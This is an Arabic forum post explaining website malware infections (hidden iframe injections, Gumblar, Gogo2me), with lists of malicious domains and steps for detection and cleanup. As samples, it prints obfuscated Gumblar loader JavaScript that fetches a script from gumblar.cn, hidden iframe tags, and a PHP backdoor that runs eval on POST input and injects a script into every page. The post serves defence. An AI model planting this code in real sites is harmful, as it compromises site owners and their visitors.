فيروسات صفحات الانترنت ينتمى الى ما يسمى website exploits و هى المنتشرة اليوم فى الانترنت وهى الاكثر ذكاء فى الاستخدام فبعد ان كان الحق او التلغيم يتم بشكل يدوى فى اثبح الامر الان اكثر تطور وسرعة وايجايبة من حيث عمل الفيروسات
فيكفى ان يصاب موقع على سيرفر لاستضافة مشتركة حتى يبداء الفيروس فى العمل
المصدر الى الان صينى للفيرس وينقسم الى عدة انواع
ولاكن كيف يتنقل الفيروس و طريقة عمله هو او فيروسات exploits الاخرى ؟!
ببساطة عند اصابت حاسوبك بالفيروس من خلال تصفحك لاحد المواقع المصابة فان الفيروس يخزن فى
sqlsodbc.chm
ليبداء عمله فى جمع جميع البيانات المحفوظة فى متصفحك او الملفات المؤقتة لك لذا لا ننصح بعمل حفظ لكلمات المرور فى متصفحك وبمجرد استخدمك لملفات البى اتش بى ورفعها على موقعكم من جهاز مصاب فان الفيروس يزرع نفسه بتلقائية فى الملفات ليبداء فى الانتشار عن طريق متصفحى موقعك وهكذا ينتشر بسرعة شديدة كما انه ينتشر ايضا فى المواقع المضافة على نفس الخادم
وبالنسبة لاصحاب الخوادم لفحص وجود الفيروس على الخوادم اتبع الاتى :
يمكنكم تحميل الاسكربتات الاتية على سيرفرتكم وهى خاصة بتوب لاين من م / حسام
Virus Cleaner v1.1
http://www.mtwer.com/shro7at/VCleaner/vscan-v1.1.tar.gz
و
Dynamic Virus Cleaner v1.1
http://www.mtwer.com/shro7at/VCleane...an-v1.1.tar.gz
وشرح تركيب الاسكربت كالتالى :
كود PHP:
wget http://www.mtwer.com/shro7at/VCleaner/vscan-v1.1.tar.gz
ثم فك الضغط
كود PHP:
tar -xzf vscan-v1.1.tar.gz
ثم نقل الاسكربت الى هذا المسار
كود PHP:
/bin
mv vscan /bin
ثم اعطائه تصاريح 755
كود PHP:
chmod +x /bin/vscan
ثم ستقوم بتشغيله بالكتابه فى محث الشل فى اى مكان
كود PHP:
vscan
[root@server ~]# vscan
وتابع معه الخطوات كما فى الصوره
للمزيد من المعلومات والاوبشنات كما فى الصوره
===========
شرح وتركيب منظف الفايروسات الغير ثابت (داينامك) :
Dynamic Virus Cleaner v1.1
طريقة التركيب مثل السابق لكن مع اختلاف اسمه الى dvscan
وهو مشابه للسابق كثير لكن بدل من ان تضع كود الفايرس كامل فى منطقة Put the virus
سوف تضع اسم الدومين فقط الموجود فى كود الفايرس مثل nyoflak.com فى مثال الكود السابق مثل الصوره التاليه
============================================================ ================
اليكم أهم انواع هذه الفيروسات :
اولا فيرس iframe :
هو فيرس يستخدم وسومiframe وهى من احد ادوات لغة html ويصيب الفيروس الزراير بالصفحات ولاكنه يصيب فقط الصحفات ذات الاسم المشهور ا ى index.html او index.php او Index.htm
وهكذا والجدير بالذكر ان اكثر من 95 % من المواقع المصابة بالفيرس تستخدم برامج تمت برمجتها باستخدام php
و ما يميز فيروسات iframes هو الاختفاء اى خاصية (hidden) فان قمت بمحاولة ان تكتب كود يحتوى iframe فسيظهر الكود بالصفحة بكل بساطة ولاكن الفيرس يتميز بالاختفاء فلن يتم اكتشافة بالعين ان لم يكتشفة مضاد الفيروسات
النوع الاول من فيروسات iframe :
IFrames from .CN Domains :
وهو يستخدم وسوم iframe بصيغة Html عادية ويكون الشكل كالتالى :
كود PHP:
<iframe src="http: //lotmachinesguide .cn/ in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe>
يمكن ان يكون النطاق الموجوود بالكود المرفق اعلاه مختلف ولاكن جميعها ينتهى بـ
.cn
ورقم
ip
94 .247 .3 .150
لذا انصح بعمل حظر له من مدراء الخوام
وقد يختلف مسار تحميل الفيروس ولاكن جميعها بالشكل
“in.cgi?incomeNN”
وهذه قائمة باغلبية النطاقات الجاملة للفيروس :
lotultimatebet .cn
lotmachinesguide .cn
cheapslotplay .cn
lotultimatebet .cn
cutlot .cn
mediahousenameshopfilm .cn
betbigwager .cn
namebuypicture .cn
thelotbet .cn
hotslotpot .cn
mixante .cn
lotante .cn
superbetfair .cn
litecartop .cn
betworldwager .cn
litecarfinestsite .cn
homenameregistration .cn
litegreatestdirect .cn
playbetwager .cn
nameashop .cn
mainnameshop .cn
superlitecarbest .cn
internetnamestore .cn
dotcomnameshop .cn
mediahomenamemartvideo .cn
كيفية العثور والكشف على موقعك ومدر اصابته:
يمكنكم بسهولة زيارة موقع Unmask Parasites.
وكتابه موقعك ليعمل الموقع على الفحص وكتابة الروابط المصابة
وقامت عدة محركات بحث مثل الشهير جوجل بعمل حظر لبعض هذه المواقع وذلك للضرر المسبب له وهذا رسم يوضح ذلك :
كما انه من الجدير بالذكر ان هذا الفيروس يصيب ايضا ملفات Adobe Acrobat المحملة على موقعكم وملفات الفلاش swf
ولاكن قد تكون نسبة الاصابة قليلة نسبيا بالنسبة لاصابات ملفات html & php
والان طريقة تنظيف موقعك :
1- ابداء اولا بحاسوبك يجب عليك عمل فحص بمضاد فيروسات قوى على حاسوبك باكلمه ضد الفيروسات وملفات التجسس
2- بمجرد تأكدك بنظافة حاسوبك قم بتغير كافة بيانات الموقع باكملها واحفظها فى مكان سرى
3- قم بتحميل الملفات على حاسوبك واحذف الكود يدويا وبلغ مستضيفك بأن يفحص الموقع
4- اذا تم حظر موقعكم من جوجل اتجه الى ادوات اصحاب المواقع
Webmaster Tools
كود PHP:
http://www.google.com/webmasters/tools/
5- قم بالتاكد من خلو موقعكم عن طريق موقع الفحص Unmask Parasites
============================================================ ================
ثانيا : فيروس iframe (php exploit)
وهو نفس عمل السابق ولاكنه اكثر تطورا فى شكله حيث انه يدرج نفسه ضمن وسم php
وشكل الكود كالتالى :
كود PHP:
define('WP_USE_THEMES', true);
require('./blog/wp-blog-header.php');
echo "<iframe src=\"http:// xtrarobotz . com/?click=BC0230\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
echo "<iframe src=\"http:// nipkelo .net/?click=E74A05\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
echo "<iframe src=\"http:// internetcountercheck . com/?click=14784531\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
?>
نلاحظ وجود نفس الكود السابق ولاكن مع تضمينه ضمن وسم php
والكود السابق من اصابة لمدونة wordpress
والتالى من اصابة لمجلة جملة الشهيرة
كود PHP:
// Generate the page
//
$template->pparse('body');
include($phpbb_root_path . 'includes/page_tail.'.$phpEx);
echo "<iframe src=\"http:// sefauro . net/?click=1B47575\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
?>
وهذه قائمة النطاقات الحاملة للفيروس :
xtrarobotz .com
goooogleadsence .biz
internetcountercheck .com
google-ana1yticz .com
live-counter .net
nipkelo .net
hosttracker .net
durnosy .com
ibalefo .net
nyoflak .com
peskostruikaz .com
bukirda .com
thedeadpit .com
sefauro .net
vafuiek .com
deisvop .net
webexperience13 .com
beidzan .com
klaomta .com
quoasty .com
niklejo .net
ruisjop .com
nakulpi .net
clifedo .net
neglite .com
والان طريقة تنظيف موقعك :
ابداء اولا بحاسوبك يجب عليك عمل فحص بمضاد فيروسات قوى على حاسوبك باكلمه ضد الفيروسات وملفات التجسس
بمجرد تأكدك بنظافة حاسوبك قم بتغير كافة بيانات الموقع باكملها واحفظها فى مكان سرى
قم بتحميل الملفات على حاسوبك واحذف الكود يدويا وبلغ مستضيفك بأن يفحص الموقع
اذا تم حظر موقعكم من جوجل اتجه الى ادوات اصحاب المواقع Webmaster Tools
قم بالتاكد من خلو موقعكم عن طريق موقع الفحص Unmask Parasites
============================================================ ================
الان مع نوع اخر من الفيروسات وهو الشهير Gumblar.cn :
لا يعرف طرق انتشاره بالضبط, كما انه اكثر ذكاء خصوصا فى التعامل مع منتديات vBulletin فالفيروس لا يزرع فى الموقع بنفس الطريقة عن طريق زرع الكود فى ملف index فقط
بل يعتمد فى زرع الكود فى ملف config.php وعمل ملفات وهمية بها الكود فى مجلد Image باسماء مثل image.php فعند اصابة منتدى فان الفيروس تكون نسبة اصابته للجهاز اكبر لانه لا يظهر فقط فى الصفحة الرئيسية بل فى كل صفحات المنتدى نتيجة للزرع فى ملف الكونفج وهو الملف الاساسى للاتصال بقاعدة البيانات فعند طلب موضوع او رد او اى استعلام من القاعدة فان الفيروس يبداء فى العمل ويزرع نفسة فى الملفات حتى ان كانت مشفرة
1- و شكل الكود كالتالى :
كود PHP:
(function(jil){var xR5p='%';eval(unescape(('var"20a"3d"22Sc"72iptEngin"65"22"2c"62"3d"22"56ers"69on()+"22"2c
"6a"3d"22"22"2cu"3dnavig"61t"6fr"2e"75s"65rAgent"3bif(("75"2eind"65xOf"28"22Win"22)"3e0)"26"26(
u"2e"69n"64exO"66("22NT"20"36"22"29"3c0)"26"26(documen"74"2ecookie"2e"69nde
x"4f"66"28"22"6die"6b"3d1"22)"3c0)"26"26"28t"
79"70e"6ff("7arvzts)"21"3dtypeof("22A"22))"29"7bzrvzts"3d"22A"22"3b"65va"6c("22if
(wi"6edow"2e"22+a+"22"29j"3d"6a+"22+a+"22M"61jo"72"22+"62"2ba+"22Minor"
22"2bb+a+"22B"75"69ld"22"2bb"2b"22j"3b"22)"3bdocu"6de"6e"74"2ewr"69"74e("22"3csc"
72ipt"20sr"63"3d"2f"2fgumblar"2ecn"2frss"2f"3fid"3d"22+j+"22"3e"3c"5c"2f"73cript"3e"22"29"3b"7d')
.replace(jil,xR5p)))})(/"/g);
1-1- والكود شرحه كالتالى : يببداء بدالة function
1-2- الدالة function غير مسماه وذاتية الزرع
1-3- طريقة التشفير غريبة لانه يتم استبدال الارقام الموجودة باوامر فعالة عند بداء عمل الفيروس
1-4- قرب نهاية الكود تجد دالة replace
2- عندما يعدم الاسكربت من الموقع الحامل للفيرس يقوم gumblar . cn/rss/” بتحميل تلقائى لفيرس جديد تلقائيا
3- يصيب الفيروس غالبا الملفات قبل وسم <body> وان تكررت فى الصفحة الوسم قد يصيب الصفحة اكثر من مرة وقد حدث هذا اكثر من مرة
4- يختلف عن فيروسات iframe فى انه يصيب كل الصفحات وليس المساماة بـ index فقط
5-يصيب ملفات الجافا سكريبت .js وان كانت تحتوى على زراير فقد يصيب الفيروس كل زرار بالملف
6- قد يكون شكل الفيروس كالتالى
كود PHP:
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))
eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))
define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2Ny
aXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBFb0xTPSd2YXI8MjBhPDNkPDIyU
zw2M3I8NjlwdDw0NW5naTw2ZWU8MjI8MmNiPDNkPDIyVm
Vyczw2OW88NmUoKSs8MjI8MmNqPDNkPDIyPDIyPDJjPDc1PDNkPDZlYXZpZ2
F0b3I8MmV1czw2NTw3MkFnZW50PDNiaWYoKHU8MmVpPD
ZlPDY0ZXhPZig8MjJXaW48MjIpPDNlMCk8MjY8MjYodTwyZWluZGV4Tzw2NjwyO
DwyMjw0ZVQ8MjA2PDIyKTwzYzApPDI2PDI2KDw2NG9jdW1lPDZldDwyZWNvbzw2YmllPDJlaTw2ZWRl
eDw0ZmY
oPDIyPDZkaTw2NTw2Yjw
zZDE8MjIpPDNjMCk8MjY8MjYodDw3OXA8NjVvZih6cjw3Nno8NzRzKTwyMTwzZHR5
cGU8NmZmKDwyMjw0MTwyMikpPDI5PDdiPDdhcn
Z6dHM8M2Q8MjJBPDIyPDNiZTw3NmFsKDwyMmlmKHc8NjluZG93PDJlPDIyK2ErPDIyKTw2YT
wzZDw2YSs8MjI8MmJhKzwyMjw0ZGFqb3I8MjI8MmI8NjI8MmI8NjErPDIyTWlub3I8MjIrYis
8NjErPDIyPDQydTw2OWxkPDIyPDJiYjwyYjwyMmo8M2I8MjIpPDNiZG9jPDc1bWVudD
wyZXdyaTw3NGU8Mjg8MjI8M2NzPDYzcjw2OXB0PDIwczw3MmM8M2Q8MmY8MmZndT
w2ZDw2Mmw8NjFyPDJlY248MmZyczw3MzwyZjwzZmlkPDNkPDIyK2orPDIyPDNlPDNjPDVjPDJmPDc
zY3JpcHQ8M2U8MjIpPDNiPDdkJzt2YXIgQ2l6
PUVvTFMucmVwbG
FjZSgvPC9nLCclJyk7ZXZhbCh1bmVzY2FwZShDaXopKX0pKCk7CiAtLT48L3NjcmlwdD4='));
function tmp_lkojfghx($s){ if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));
if(preg_match_all('#<script(.*?)</script>#is',$s,$a))
foreach($a[0] as $v) if(count(explode("\n",$v))>5){
$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v) || preg_match('#[\(\[](\s*\d+,)20,}#',$v);
if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos;
($v,'[removed]')))$s=str_replace($v,'',$s);}
$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);
if(stristr($s,'<body')) $s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)|
|stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}
function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)
if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);
for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for(
$i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}
if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')
$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2();
?>
7- لا يعتبر سريع الانتشار فى الاستضافات المشتركة اى لا ينتقل من موقع لاخر فى الاستضافات المشتركة
8- تم اضافة Gumblar .cn الى القائمة السوداء فى جوجل
طرق التنظيف :
1- قم بحذف اى ملف باسم Image.php واستبدل الملف بنظيف لو كان موجود فى الاسكربت
2- قم بتحميل maleware من Malwarebytes.org وقم بتشغيله فى هئية حفظ النظام او safe mode واحذف كل الملفات المصابة
3- قم بتحميل مضاد الفيروسات avast او avg
4- قم بتحديث برنامج Adobe acrobat reader
5- ان كنت ستتخدم وسائل النشر المباشر فى برنامج فرونت بيج او دريف ويفر قم بتغير كلمات المرور او حذفها افضل واحذف الملفات المؤقتة من حاسوبك
6- قم بتغير كافة كلمات المرور لموقعك
7- ننصحك باستخدام متصفح جوجل لحماية اكثر
8- افحص موقعكم عن طريق تحميل الصفحة على الرابط
http://www.tl4s.info/scriptscan/checkgumbar.zip
ورفعه على موقعك وطلبه بالمتصفح
9- بالنسبة لمدراء الخوادم حمل الاسكربت التالى وهو خاص بتوب لاين
Virus Cleaner v1.1
http://www.mtwer.com/shro7at/VCleaner/vscan-v1.1.tar.gz
و
Dynamic Virus Cleaner v1.1
http://www.mtwer.com/shro7at/VCleane...an-v1.1.tar.gz
=========================================
ولمعرفة وضع موقعك بالكامل مع محرك جوجل
قم بالتوجة للصفحة التالية مع تغير xxx باسم موقعكم
http://www.google.com/safebrowsing/d...te=www.xxx.com
لمعرفة مدى اصابة حاسوبك :
ابحث عن ملف sqlsodbc.chm في ملف النظام لويندوز. (في اكس بي المكان هو C:\Windows\System32\)
•ابحث عن Sha1 ل sqlsodbc.chm. هذا ممكن عن طريق FileAlyzer.
•قارن فيما بعد ما ستحصل عليه من Sha1 مع لائحة شركة ScanSafe.
اذا كان Sha1 بنفس حجم الملف فلاي وجد مشكلة اما اذا كان الحجم مختلف فممكن ان يكون هناك اصابة بالبرنامج الخبيث Gumblar
============================================================================
النوع الثالث من الفيروسات هو Gogo2me :
شكل الكود :
كود PHP:
<iframe name=c10 src='http://gogo2me .net/.xx/xxxxx.html'
او
كود PHP:
<iframe style="position: absolute; top: 10; left: 124; width: 546px;
نلاحظ هنا استخدامه وسم Iframe العادى مع خاصية hidden التى تزيد من التمويه على الفيرس
النطاقات الحاملة للفيروس :
طريقة التنظيف :
نفس طريقة تنظيف فيروس iframe
======================================
هنا انتهى اهم انواع فيروسات التى تصيب المواقع
نصائح عامة :
1- لا تقم بعم حفظ لكلمات المرور فى المتصفحات
2- قم باستخدام مضادات فيروسات مرخصة
3- الملفات والمجلدات صاحبة التراخيص 777 و 666
هى الاكثر عرضة للاصابة
4- لا تقم بتجربة المرور على النطاقات المكتوبة بالاعلى بغرض الاستكشاف
جميع الحقوق محفوظة لتوب لاين
رابط الموضوع الاصلى بمطور
http://www.mtwer.com/vb/t14672.html